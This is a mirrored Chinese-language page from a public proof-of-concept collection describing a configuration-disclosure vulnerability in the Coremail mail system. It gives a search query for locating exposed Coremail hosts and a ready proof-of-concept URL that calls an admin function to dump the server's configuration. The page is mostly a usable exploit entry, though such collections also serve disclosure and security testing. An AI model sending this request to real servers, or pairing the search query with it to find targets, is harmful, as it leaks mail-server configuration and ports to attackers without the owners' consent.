mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-06 11:27:43 +00:00
30 lines
398 B
Markdown
30 lines
398 B
Markdown
|
|
# Coremail 配置信息泄露漏洞
|
||
|
|
|
||
|
|
## 漏洞描述
|
||
|
|
|
||
|
|
Coremail 某个接口存在配置信息泄露漏洞,其中存在端口,配置信息等
|
||
|
|
|
||
|
|
## 漏洞影响
|
||
|
|
|
||
|
|
```
|
||
|
|
Coremail 配置信息泄露漏洞
|
||
|
|
```
|
||
|
|
|
||
|
|
## 网络测绘
|
||
|
|
|
||
|
|
```
|
||
|
|
app="Coremail邮件系统"
|
||
|
|
```
|
||
|
|
|
||
|
|
## 漏洞复现
|
||
|
|
|
||
|
|
POC为
|
||
|
|
|
||
|
|
```plain
|
||
|
|
http://xxx.xxx.xxx.xxx/mailsms/s?func=ADMIN:appState&dumpConfig=/
|
||
|
|
```
|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|
|